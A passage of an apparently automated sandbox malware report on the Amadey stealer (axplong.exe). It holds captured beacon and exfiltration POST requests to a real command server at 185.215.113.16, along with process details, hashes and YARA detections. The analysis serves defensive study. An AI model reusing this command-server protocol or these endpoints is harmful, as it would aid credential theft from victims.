                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:59.714957952 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:59 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:59.718410015 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:59.952755928 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:59 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  52192.168.2.549764185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:53:00.075587034 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:53:00.789294958 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:53:00 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:53:00.790312052 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:53:01.032973051 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:53:00 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  53192.168.2.549765185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:53:01.153599024 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:53:01.844961882 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:53:01 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:53:01.848648071 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:53:02.072056055 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:53:01 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  54192.168.2.549766185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:53:02.185340881 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:53:02.884828091 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:53:02 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:53:02.885943890 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:53:03.127239943 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:53:03 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  55192.168.2.549767185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:53:03.246793032 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:53:03.942074060 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:53:03 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  56192.168.2.549768185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:53:03.954462051 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:53:04.715006113 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:53:04 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  57192.168.2.549769185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:53:04.828118086 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:53:05.519107103 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:53:05 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  58192.168.2.549770185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:53:05.529623032 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:53:06.238135099 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:53:06 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  59192.168.2.549772185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:53:06.479152918 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:53:07.190201998 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:53:07 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  60192.168.2.549773185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:53:07.317898989 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:53:08.038485050 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:53:07 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:53:08.042412043 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:53:08.275141954 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:53:08 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  61192.168.2.549774185.215.113.16801408C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:53:08.393218994 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:53:09.086550951 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:53:08 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session IDSource IPSource PortDestination IPDestination Port
                  62192.168.2.549775185.215.113.1680
                  TimestampBytes transferredDirectionData
                  Sep 26, 2024 19:53:09.100327969 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 38 41 30 34 32 43 44 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:53:09.811245918 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:53:09 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:13:51:04
                  Start date:26/09/2024
                  Path:C:\Users\user\Desktop\file.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\file.exe"
                  Imagebase:0x20000
                  File size:1'936'896 bytes
                  MD5 hash:2EC94ACBF5439B6B76B4A04D1D779397
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2147793843.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.2107291680.0000000004800000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:true

                  General

                  Target ID:2
                  Start time:13:51:07
                  Start date:26/09/2024
                  Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                  Imagebase:0xbf0000
                  File size:1'936'896 bytes
                  MD5 hash:2EC94ACBF5439B6B76B4A04D1D779397
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.2143475152.00000000049D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.2184346914.0000000000BF1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                  Antivirus matches:
                  • Detection: 100%, Avira
                  • Detection: 100%, Joe Sandbox ML
                  Reputation:low
                  Has exited:true

                  General

                  Target ID:3
                  Start time:13:51:08
                  Start date:26/09/2024
                  Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Imagebase:0xbf0000
                  File size:1'936'896 bytes
                  MD5 hash:2EC94ACBF5439B6B76B4A04D1D779397
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.2148769900.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.2189315361.0000000000BF1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:true

                  General

                  Target ID:7
                  Start time:13:52:00
                  Start date:26/09/2024
                  Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Imagebase:0xbf0000
                  File size:1'936'896 bytes
                  MD5 hash:2EC94ACBF5439B6B76B4A04D1D779397
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000003.2659233267.0000000005080000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:false

                  Disassembly

                  Reset < >

                    Executed Functions

                    Function 04A20C01 Relevance: .1, Instructions: 97COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2155255856.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4a20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6c09256a6c65b00002c83edc3ebe5b11e3a5c0ead12bd083fcd471fd8f34738c
                    • Instruction ID: fcdccec12e93b187dc88c3a1fdb3897ce5d25740fc120aa319153bf698d2d066
                    • Opcode Fuzzy Hash: 6c09256a6c65b00002c83edc3ebe5b11e3a5c0ead12bd083fcd471fd8f34738c
                    • Instruction Fuzzy Hash: 9D119DFB31E130BD7141824A2B64AFA977DE1D5B30330882BFA0BC5506E2996E4A7132
                    Function 04A20C2F Relevance: 1.4, Strings: 1, Instructions: 120COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2155255856.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4a20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID: kZXP
                    • API String ID: 0-3040969424
                    • Opcode ID: 5dbf49d9d0caf65a1bec0d44ec8a2ce61ee9107f4cb62223284d2336eb29d288
                    • Instruction ID: 6391d1809c7784868456dbd430d415f1ea82d4caec09ff73d635f912cd59b5f0
                    • Opcode Fuzzy Hash: 5dbf49d9d0caf65a1bec0d44ec8a2ce61ee9107f4cb62223284d2336eb29d288
                    • Instruction Fuzzy Hash: CC21ACFB31E220BDB20182196B54AF76B7DE6D1B30331C927F987C6406E259AE4E7171
                    Function 04A20C09 Relevance: 1.4, Strings: 1, Instructions: 100COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2155255856.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4a20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID: kZXP
                    • API String ID: 0-3040969424
                    • Opcode ID: b7ff78925a7631b44bb0349e79eaa2f6cfafe3f1029bc619ec9351611a4eb6e0
                    • Instruction ID: a31fd8dfbb4dc86a77f00d355f75f18bedb2dfd695ece3b3aa472cecd7a425a3
                    • Opcode Fuzzy Hash: b7ff78925a7631b44bb0349e79eaa2f6cfafe3f1029bc619ec9351611a4eb6e0
                    • Instruction Fuzzy Hash: E5114CFB30E120BD7241825A7B64AF76B7DE5D5B30331C82BF907C5406E255AE4A7171
                    Function 04A20BE2 Relevance: .1, Instructions: 100COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2155255856.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4a20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0b2bad677dafee54f12d720375d90486337c949b926b0c8598f4a42dd0fea526
                    • Instruction ID: 755fc4336216889c7f3904bb4183a29ee2c9e84fd266800ca7e91c496eb99e6c
                    • Opcode Fuzzy Hash: 0b2bad677dafee54f12d720375d90486337c949b926b0c8598f4a42dd0fea526
                    • Instruction Fuzzy Hash: 59115EFB30E170BEB24282593B64AF66B7DE5D57303308467F946CA416E2592A4F7131
                    Function 04A20C6B Relevance: .1, Instructions: 78COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2155255856.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4a20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8e441a0f90c866614d44e6da6496bda0193cd4a54ac51c3c7b298ed214c4eb88
                    • Instruction ID: e9481348357ee5511afdc93bb1e5f8457745e42b12ce8307c28c4f8b795988b6
                    • Opcode Fuzzy Hash: 8e441a0f90c866614d44e6da6496bda0193cd4a54ac51c3c7b298ed214c4eb88
